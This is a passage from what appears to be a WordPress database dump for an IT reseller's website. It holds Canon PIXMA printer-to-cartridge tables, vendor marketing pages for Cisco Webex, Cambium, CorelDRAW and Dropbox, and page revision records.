</tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP810</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP830</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"7\" align=\"center\">PIXMA MP970</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Photo Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Photo Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP988</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP996</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n  </tbody>\n</table>\n<table width=\"378\" border=\"1\" cellpadding=\"10\">\n  <tbody>\n  <tr align=\"center\">\n    <td width=\"170\"><strong>Model</strong></td>\n    <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n  </tr>\n  <tr>\n    <td rowspan=\"5\" align=\"center\">PIXMA MX308</td>\n    <td>CL-41 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-831 (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-40 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-40/CL-41 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-830 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"6\" align=\"center\">PIXMA MX328</td>\n    <td>CL-811 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-811XL (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-810 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-810 Twin Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810/CL-811 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810XL (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"6\" align=\"center\">PIXMA MX338</td>\n    <td>CL-811 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-811XL (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-810 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-810 Twin Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810/CL-811 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810XL (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"6\" align=\"center\">PIXMA MX347</td>\n    <td>CL-811 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-811XL (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-810 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-810 Twin Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810/CL-811 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810XL (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"6\" align=\"center\">PIXMA MX366</td>\n    <td>CL-811 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-811XL (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-810 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-810 Twin Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810/CL-811 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810XL (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"6\" align=\"center\">PIXMA MX426</td>\n    <td>CL-811 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-811XL (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-810 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-810 Twin Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810/CL-811 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810XL (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"5\" align=\"center\">PIXMA MX876</td>\n    <td>CLI-821 (Black)</td>\n  </tr>\n  <tr>\n    <td>CLI-821 (Cyan)</td>\n  </tr>\n  <tr>\n    <td>CLI-821 (Magenta)</td>\n  </tr>\n  <tr>\n    <td>CLI-821 (Yellow)</td>\n  </tr>\n  <tr>\n    <td>PGI-820 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"5\" align=\"center\">PIXMA MX886</td>\n    <td>CLI-726 (Black)</td>\n  </tr>\n  <tr>\n    <td>CLI-726 (Cyan)</td>\n  </tr>\n  <tr>\n    <td>CLI-726 (Magenta)</td>\n  </tr>\n  <tr>\n    <td>CLI-726 (Yellow)</td>\n  </tr>\n  <tr>\n    <td>PGI-725 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"12\" align=\"center\">PIXMA PRO-1</td>\n    <td>PGI-29 (Chroma Optimizer)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Cyan)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Dark Gray)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Gray)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Light Gray)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Magenta)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Matte Black)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Photo Black)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Photo Cyan)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Photo Magenta)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Red)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Yellow)</td>\n  </tr>\n  </tbody>\n</table>\n<table width=\"378\" border=\"1\" cellpadding=\"10\">\n  <tbody>\n    <tr align=\"center\">\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"10\" align=\"center\">PIXMA PRO-10</td>\n      <td>PGI-72 (Chroma Optimizer)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Gray)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Matte Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Photo Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Photo Cyan)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Photo Magenta)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Red)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Yellow)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"8\" align=\"center\">PIXMA PRO-100</td>\n      <td>CLI-42 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-42 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-42 (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-42 (Light Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-42 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-42 (Photo Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-42 (Photo Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-42 (Yellow)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"10\" align=\"center\">PIXMA TR8570</td>\n      <td>CLI-781 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-780 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-780XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA TS207</td>\n      <td>CL-746 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-746S (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-746XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-745 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-745S (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-745XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA TS307</td>\n      <td>CL-746 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-746S (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-746XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-745 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-745S (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-745XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"10\" align=\"center\">PIXMA TS5070</td>\n      <td>CLI-771 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-771 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-771 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-771 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-771XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-771XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-771XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-771XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-770 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-770XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA TS5170</td>\n      <td>CL-741 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-741XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-740 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-740/CL-741 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-740XL (Pigment Black)</td>\n    </tr>\n  </tbody>\n</table><table width=\"378\" border=\"1\" cellpadding=\"10\">\n  <tbody>\n    <tr align=\"center\">\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"12\" align=\"center\">PIXMA TS8270</td>\n      <td>CLI-781 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Photo Blue)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Photo Blue)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-780 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-780XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"12\" align=\"center\">PIXMA TS9170</td>\n      <td>CLI-781 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Photo Blue)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Photo Blue)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-780 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-780XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"10\" align=\"center\">PIXMA TS9570</td>\n      <td>CLI-781 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-780 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-780XL (Pigment Black)</td>\n    </tr>\n  </tbody>\n</table>','Canon','','publish','closed','closed','','canon','','','2019-09-25 11:28:14','2019-09-25 03:28:14','',0,'https://bintara.com.my/?page_id=1449',0,'page','',0),(1450,1,'2018-12-11 12:57:41','2018-12-11 04:57:41','<h2>CISCO WEBEX</h2>\r\n&nbsp;\r\n\r\n<h3>SIMPLY THE BEST VIDEO CONFERENCING &amp; ONLINE MEETINGS.</h3>\r\nWith Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters.\r\n<center><img class=\"alignnone wp-image-1855 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_2-236x300.jpg\" alt=\"\" width=\"236\" height=\"300\" /></center>\r\n\r\n<h3>MEET FACE TO FACE. WHEREVER YOU ARE.</h3>\r\nVideo conferencing is as simple and seamless as meeting in person. With the Webex mobile app, you can meet absolutely anywhere. Hosting is easy and joining is easier-simply click on your link to join. Include everyone, even guests.\r\n<center><img class=\"alignnone wp-image-1856 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_3-216x300.png\" alt=\"\" width=\"216\" height=\"300\" /></center>\r\n\r\n<h3>GET ON THE SAME PAGE.</h3>\r\nSeeing is believing. Share your screen so everyone can view your document, spreadsheet, or application. You can even have the host record the meeting so others can get up to speed later.\r\n<center><img class=\"alignnone wp-image-1857 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_4-300x206.jpg\" alt=\"\" width=\"300\" height=\"206\" /></center>\r\n\r\n<h3>INVITE ANYONE OR EVERYONE.</h3>\r\nSchedule and join meetings from where you work. Everyone you invite can join your online meeting, no matter how theyâ€™re connecting, even guests. Big crowd? Not a problem. You can meet with over 40,000 people.\r\n<center><img class=\"alignnone wp-image-1858 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_5-240x300.png\" alt=\"\" width=\"240\" height=\"300\" /></center>\r\n\r\n<h3>CLICK OR TAP TO JOIN.</h3>\r\nEasily start or join using Productivity Tools. Now you can join a video meeting with no dialing in. You can also host or join without a download by using the Webex app.\r\n\r\n&nbsp;\r\n<h3>HOST EVENTS. TRAIN YOUR TEAM. SUPPORT YOUR CUSTOMERS.</h3>\r\n\r\n&nbsp;\r\n<h4><strong>WEBINARS</strong></h4>\r\n\r\nWith Cisco Webex Events, host interactive webinars with HD video and broadcast-quality audio for audiences up to 3,000.\r\n\r\n<h4><strong>WEBCASTING</strong></h4>\r\n\r\nHost large-scale virtual events for more than 40,000 participants with expertise from Cisco Webex Webcasting to ensure itâ€™s a success.\r\n\r\n<h4><strong>ONLINE LEARNING</strong></h4>\r\n\r\nLead live or on-demand trainings with Cisco Webex Training. Host breakout sessions, testing and automated grading with over 1,000 participants.\r\n\r\n<h4><strong>REMOTE SUPPORT</strong></h4>\r\n\r\nCisco Webex Support provides efficient customer service with remote desktop control and live chat.\r\n\r\n&nbsp;\r\n\r\n<center>[maxbutton id=\"1\"]</center>','Cisco','','publish','closed','closed','','cisco','','','2019-09-25 11:54:04','2019-09-25 03:54:04','',0,'https://bintara.com.my/?page_id=1450',0,'page','',0),(1451,1,'2018-12-11 12:57:17','2018-12-11 04:57:17','<h2>Solutions for all your wireless needs</h2><p>Â </p><h3><strong>Local Government</strong></h3><p>Connect events, people, and places with the reliable technology that provides the highest throughput at the lowest total cost. Local governments have deployed wireless connectivity to create city hotspots, monitor facilities, and connect events.</p><h3><strong>Higher Education</strong></h3><p>Classrooms, dormitories, research labs, auditoriums, and stadiums go dark. Every aspect of higher education depends on being connected, and wireless solutions from Cambium Networks provide affordable quality in end-to-end connectivity. Rapidly deploy the network you need at a fraction of the cost of leased lines or fiber build-outs.</p><h3><strong>Regional Service Providers</strong></h3><p>Wireless broadband solutions that operate in both the licensed and unlicensed spectrum are proven to connect millions of users around the world, and technology from Cambium Networks is designed to provide the spectral efficiency, coverage, and capacity to offer consistently reliable wireless connectivity to business and residential subscribers.</p><h3><strong>Oil and Gas</strong></h3><p>Wireless network connectivity for data transfer, SCADA monitoring and control, and video surveillance at indoor and outdoor locations. Contact us for more information.</p><h3><strong>Small Medium Business Retail</strong></h3><p>Connectivity provides immediate access to information and improves efficiency throughout the business. Small and medium businesses can move fast to integrate technology into their business process and experience the benefits.</p><h3><strong>Managed Service Providers</strong></h3><p>cnPilot Wi-Fi technology with cnMaestro controller management support the MSPs delivery of trouble-free service to customers, reduce the total operating costs and protect their clientsâ€™ bottom lines.</p><h3><strong>Federal Government</strong></h3><p>Our field-proven, agency-vetted solutions provide reliable broadband for video, voice, and data applications.</p><h3><strong>Retail</strong></h3><p>Connectivity is changing the retail experience. Retailers can improve store efficiency while providing customers with the Wi-Fi connectivity that enhances their shopping experience</p><h3><strong>Smart Cities</strong></h3><p>Wireless broadband provides high-speed, rapidly deployed connectivity for WiFi, video surveillance, data transfer, and SCADA control.</p><p>Â </p><center></center><center></center><center>[maxbutton id=\"1\" ]</center><p>Â </p>','Cambium','','publish','closed','closed','','cambium','','','2019-09-24 15:04:35','2019-09-24 07:04:35','',0,'https://bintara.com.my/?page_id=1451',0,'page','',0),(1452,1,'2018-12-11 12:55:01','2018-12-11 04:55:01','','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2018-12-11 12:55:01','2018-12-11 04:55:01','',1435,'https://bintara.com.my/blog/2018/12/11/1435-revision-v1/',0,'revision','',0),(1453,1,'2018-12-11 12:55:10','2018-12-11 04:55:10','','Adobe','','inherit','closed','closed','','1436-revision-v1','','','2018-12-11 12:55:10','2018-12-11 04:55:10','',1436,'https://bintara.com.my/blog/2018/12/11/1436-revision-v1/',0,'revision','',0),(1454,1,'2018-12-11 12:55:29','2018-12-11 04:55:29','','Anydesk','','inherit','closed','closed','','1437-revision-v1','','','2018-12-11 12:55:29','2018-12-11 04:55:29','',1437,'https://bintara.com.my/blog/2018/12/11/1437-revision-v1/',0,'revision','',0),(1455,1,'2018-12-11 12:55:36','2018-12-11 04:55:36','','APC','','inherit','closed','closed','','1438-revision-v1','','','2018-12-11 12:55:36','2018-12-11 04:55:36','',1438,'https://bintara.com.my/blog/2018/12/11/1438-revision-v1/',0,'revision','',0),(1456,1,'2018-12-11 12:55:43','2018-12-11 04:55:43','','Apple','','inherit','closed','closed','','1439-revision-v1','','','2018-12-11 12:55:43','2018-12-11 04:55:43','',1439,'https://bintara.com.my/blog/2018/12/11/1439-revision-v1/',0,'revision','',0),(1457,1,'2018-12-11 12:56:07','2018-12-11 04:56:07','Next-Generation Firewall, Next-Generation Endpoint. <a href=\"https://bintara.com.my/sophos/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1840\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Sophos-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','SOPHOS','','publish','closed','closed','','sophos','','','2019-01-03 10:04:53','2019-01-03 02:04:53','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1457',0,'portfolio','',0),(1458,1,'2018-12-11 12:55:52','2018-12-11 04:55:52','','Aruba','','inherit','closed','closed','','1440-revision-v1','','','2018-12-11 12:55:52','2018-12-11 04:55:52','',1440,'https://bintara.com.my/blog/2018/12/11/1440-revision-v1/',0,'revision','',0),(1459,1,'2018-12-11 12:56:02','2018-12-11 04:56:02','','Asus','','inherit','closed','closed','','1442-revision-v1','','','2018-12-11 12:56:02','2018-12-11 04:56:02','',1442,'https://bintara.com.my/blog/2018/12/11/1442-revision-v1/',0,'revision','',0),(1460,1,'2018-12-11 12:56:13','2018-12-11 04:56:13','','ATLAS.ti','','inherit','closed','closed','','1443-revision-v1','','','2018-12-11 12:56:13','2018-12-11 04:56:13','',1443,'https://bintara.com.my/blog/2018/12/11/1443-revision-v1/',0,'revision','',0),(1461,1,'2018-12-11 12:57:11','2018-12-11 04:57:11','Data Backup Software on-premises, cloud-based or hybrid deployments. <a href=\"https://bintara.com.my/storagecraft/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1776\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StorageCraft-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','STORAGECRAFT','','publish','closed','closed','','storagecraft','','','2019-01-03 10:05:10','2019-01-03 02:05:10','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1461',0,'portfolio','',0),(1462,1,'2018-12-11 12:56:36','2018-12-11 04:56:36','','Barracuda','','inherit','closed','closed','','1445-revision-v1','','','2018-12-11 12:56:36','2018-12-11 04:56:36','',1445,'https://bintara.com.my/blog/2018/12/11/1445-revision-v1/',0,'revision','',0),(1463,1,'2018-12-11 12:56:46','2018-12-11 04:56:46','','Belkin','','inherit','closed','closed','','1446-revision-v1','','','2018-12-11 12:56:46','2018-12-11 04:56:46','',1446,'https://bintara.com.my/blog/2018/12/11/1446-revision-v1/',0,'revision','',0),(1464,1,'2018-12-11 12:56:54','2018-12-11 04:56:54','','BenQ','','inherit','closed','closed','','1447-revision-v1','','','2018-12-11 12:56:54','2018-12-11 04:56:54','',1447,'https://bintara.com.my/blog/2018/12/11/1447-revision-v1/',0,'revision','',0),(1465,1,'2018-12-11 12:57:07','2018-12-11 04:57:07','','Bitdefender','','inherit','closed','closed','','1448-revision-v1','','','2018-12-11 12:57:07','2018-12-11 04:57:07','',1448,'https://bintara.com.my/blog/2018/12/11/1448-revision-v1/',0,'revision','',0),(1466,1,'2018-12-11 12:57:17','2018-12-11 04:57:17','','Cambium','','inherit','closed','closed','','1451-revision-v1','','','2018-12-11 12:57:17','2018-12-11 04:57:17','',1451,'https://bintara.com.my/blog/2018/12/11/1451-revision-v1/',0,'revision','',0),(1467,1,'2018-12-11 12:57:39','2018-12-11 04:57:39','Network Attached Storage (NAS). <a href=\"https://bintara.com.my/synology/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1777\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Synology-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','SYNOLOGY','','publish','closed','closed','','synology','','','2019-01-03 10:09:49','2019-01-03 02:09:49','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1467',0,'portfolio','',0),(1468,1,'2018-12-11 12:57:26','2018-12-11 04:57:26','','Canon','','inherit','closed','closed','','1449-revision-v1','','','2018-12-11 12:57:26','2018-12-11 04:57:26','',1449,'https://bintara.com.my/blog/2018/12/11/1449-revision-v1/',0,'revision','',0),(1469,1,'2018-12-11 12:57:41','2018-12-11 04:57:41','','Cisco','','inherit','closed','closed','','1450-revision-v1','','','2018-12-11 12:57:41','2018-12-11 04:57:41','',1450,'https://bintara.com.my/blog/2018/12/11/1450-revision-v1/',0,'revision','',0),(1470,1,'2018-12-11 12:58:24','2018-12-11 04:58:24','Remote Support, Remote Access, Service Desk. <a href=\"https://bintara.com.my/teamviewer/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1697\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Logo-TV.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','TEAMVIEWER','','publish','closed','closed','','teamviewer','','','2019-01-03 10:09:58','2019-01-03 02:09:58','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1470',0,'portfolio','',0),(1471,1,'2018-12-11 12:58:01','2018-12-11 04:58:01','','Autodesk','','inherit','closed','closed','','1444-revision-v1','','','2018-12-11 12:58:01','2018-12-11 04:58:01','',1444,'https://bintara.com.my/blog/2018/12/11/1444-revision-v1/',0,'revision','',0),(1472,1,'2018-12-11 13:00:16','2018-12-11 05:00:16','<h2>CorelDRAW Graphics Suite 2018</h2>\r\n\r\n&nbsp;\r\n<h3>Graphic design software</h3>\r\n<ul>\r\n 	<li>New state-of-the-art Symmetry mode</li>\r\n 	<li>New creative effects with Block Shadow tool</li>\r\n 	<li>New quick and direct publish to WordPress</li>\r\n 	<li>Newly integrated features: Impact tool, PhotoCocktail and more</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h3>Empower your creativity</h3>\r\n<p class=\"sectionDesc\" style=\"text-align: justify;\">CorelDRAWÂ® Graphics Suite 2018 is a leading graphic design software enjoyed by millions of professionals, small business owners, and design enthusiasts worldwide. It offers a seamless design experience for graphics, layout, illustration, photo editing, tracing, web images, print projects, art, typography, and more. Design with confidence and achieve stunning results.</p>\r\n<iframe src=\"https://www.youtube.com/embed/Up_2sjU4GfU\" width=\"960\" height=\"540\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\n&nbsp;\r\n<ol class=\"circles-list\">\r\n 	<li>\r\n<h4>Comprehensive</h4>\r\nEnjoy professional applications to produce any design or photo project.</li>\r\n 	<li>\r\n<h4>Creative</h4>\r\nExplore versatile, intuitive tools to express your unique style and impress your audience.</li>\r\n 	<li>\r\n<h4>Productive</h4>\r\nRely on industry-leading file format compatibility and faster processing to make complex workflow tasks more efficient.</li>\r\n 	<li>\r\n<h4>Innovative</h4>\r\nStay on the cutting-edge of design technology and enrich your creative journey with state-of-the-art tools.</li>\r\n 	<li>\r\n<h4>User-friendly</h4>\r\nEnjoy a seamless design experience with a tailor-made interface and unmatched customization capabilities.</li>\r\n</ol>\r\n\r\n&nbsp;\r\n<center>[maxbutton id=\"1\" ]</center>','CorelDRAW','','publish','closed','closed','','coreldraw','','','2019-09-25 12:00:25','2019-09-25 04:00:25','',0,'https://bintara.com.my/?page_id=1472',0,'page','',0),(1473,1,'2018-12-11 13:02:28','2018-12-11 05:02:28','<img class=\"alignnone wp-image-1891\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/download.png\" alt=\"\" width=\"475\" height=\"57\" />\r\n\r\n&nbsp;\r\n<h2 class=\"c43-page-header-level-3-plank__headline\">Small business solutions</h2>\r\n<div class=\"c43-page-header-level-3-plank__text\">\r\nEvery business starts out small. We did. And we know from experience the benefits of having the right tools. Tools that help you grow, and grow with you. Tools that let small teams have a big impact.\r\n\r\n&nbsp;\r\n<h2 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Small but mighty businesses run on Dropbox</h2>\r\n<div class=\"c01-section-heading-plank__subheadline plank-text\">\r\nWhatever the size, Dropbox Business is helping these businesses bring new ideas to the world and find new ways of working together to achieve mighty things.\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n<h2>Features</h2>\r\n<strong>Flexible storage plans</strong>\r\nChoose the right plan to ensure your team has the space it needs to be productive.\r\n\r\n<strong>File and version recovery</strong>\r\nEasily recover deleted files and restore previous file versions.\r\n\r\n<strong>Team folder manager</strong>\r\nGet visibility and control over team folders, including sync management.\r\n\r\n<strong>Link permissions</strong>\r\nPassword-protect your links, disable downloads, or set expiration dates to grant temporary 